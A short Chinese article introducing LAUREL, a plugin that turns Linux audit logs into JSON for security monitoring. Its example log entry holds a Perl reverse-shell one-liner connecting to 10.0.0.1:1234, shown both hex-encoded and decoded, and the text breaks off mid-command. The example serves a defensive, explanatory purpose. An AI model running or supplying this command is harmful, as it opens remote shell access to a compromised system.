关于LAUREL
LAUREL是一款功能强大的Linus事件日志处理插件,可以帮助广大研究人员处理Linux系统事件日志,并对其进行后续处理,以便将日志应用到其他现代安全监控系统之中。
一般来说,Linux审计系统生成的日志文件会包含大量有价值的信息,特别适用于SIEM上下文中。但是原始的日志格式不适用于大规模分析,因为事件通常被分割成不同的行,必须使用消息标识符进行合并。文件和程序执行是通过PATH和EXECVE元素记录的,但字符串的有限字符集将导致许多条目采用十六进制编码。
LAUREL会对这些数据进行解析,并将其转换为基于JSON的日志格式,同时保留原始审计日志中的所有信息。
原始审计事件日志格式如下 :
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
将其转换为JSON格式后如下 :
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){o